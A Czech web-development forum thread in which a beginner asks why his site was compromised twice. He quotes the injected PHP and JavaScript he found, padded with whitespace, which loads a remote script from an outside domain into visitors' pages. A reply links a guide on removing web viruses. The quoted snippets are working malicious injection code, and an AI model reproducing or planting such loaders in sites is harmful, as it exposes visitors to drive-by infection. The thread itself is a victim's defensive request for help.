Autor Zpráva
Petrck
Profil
Dobrý den,

za poslední měsíc jsem zaznamenal dva VELICE podobné útoky na vytvářené stránky. Nejednalo se o nic zákeřného, script měl za úkol "rozhodit" obsah stránky, například kalendář, jelikož jsou výstupy ošetřeny htmlspecialchars() funkcemi, vypsal se pouze javascriptový kod. Samozřejmě i to je nepříjemné.

Ukázka útoku:

mějme na stránce vložený například kalendář jQuery Timepicker Addon. Script, který jej vkládá obsahuje mimo jiné také konfigurační soubory, pro možnost změn názvů měsíců, šířky kalendáře a důležitá věc, jednotlivé události, generované jako json data, případně jako pole. Tyto události jsem do JS vkládal php scriptem, takže něco takového:
<script type="javascript">
document.ready() ...

...

events: 
<?php 

$kalendar = new TKalendar();
htmlentities(json_encode($kalendar->getEvents(), ENT_QUOTES);

?>,

....

</script>
No a nedávno, mě čekalo nemilé překvapení. Místo kalendáře se objevil pouze javascriptový kod s jistou funcktí uvnitř. Funkce byla napsaná zvlášť pro php a js soubory:

PHP:

#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                 function srcc() { var tmnd = document.createElement('script'); tmnd.src = 'http://portraitsurcommande.fr/bx948LtP.php'; if (!document.getElementById('tmnd')) { document.write('<div id=\'tmnd\'></div>'); document.getElementById('tmnd').appendChild(tmnd); }}srcc();</script>";

#/0f2490#

JS:

/*0f2490*/
                                                                                                                                                                                                                                                                                                                                                                                                                 function srcc() {
 var pwg = document.createElement('script');
 pwg.src = 'http://portraitsurcommande.fr/bx948LtP.php';
 if (!document.getElementById('pwg')) {
 document.write('<div id=\'pwg\'></div>');
 document.getElementById('pwg').appendChild(pwg);
 }
}
srcc();

/*/0f2490*
Poslední, co jsem objevil byl soubor s php funkcí, který se nacházel přímo ve složce jquery(tedy se zdrojovými soubory jquery.min.js). Linky na leteckou poštu apod. jsou zde zakázané, takže jedině pokud někdo bude mít čas, poslal bych ho na mail apod...

Napadená stránka: http://www.doswich.cz (nyní opět v normálu - znovu nahrána a prohlídnuta programem NOD)

Vzhledem k tomu, že už je to po druhé, tak bych rád věděl, kde dělám chybu. Přeci jen jsem stále začátečník a pokud by mi někdo dokázal poradit nebo s někdo s podobným problémem setkal, byl bych vděčný za každou radu.

Zatím jediné, co mě napadlo, změnit heslo u ftp a v total commanderu jej neukládat. dočetl jsem se, že prý se tam dá celkem dobře dostat. Další věc, která mě napadla, je zablokování stránky, na kterou útočník odkazoval ve své funkci v souboru htacess.

Všem moc děkuji za pomoc i věnovaný čas!
Jan Tvrdík
Profil
Pro začátek si přečti Máte na webu virus — co s tím?
Petrck
Profil
Toto jsem samozřejmě četl, jen jsem si nebyl jistý, zda je to právě tento případ. V tom případě uvědomím ostatní a budeme postupovat podle návodu. Děkuji moc

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: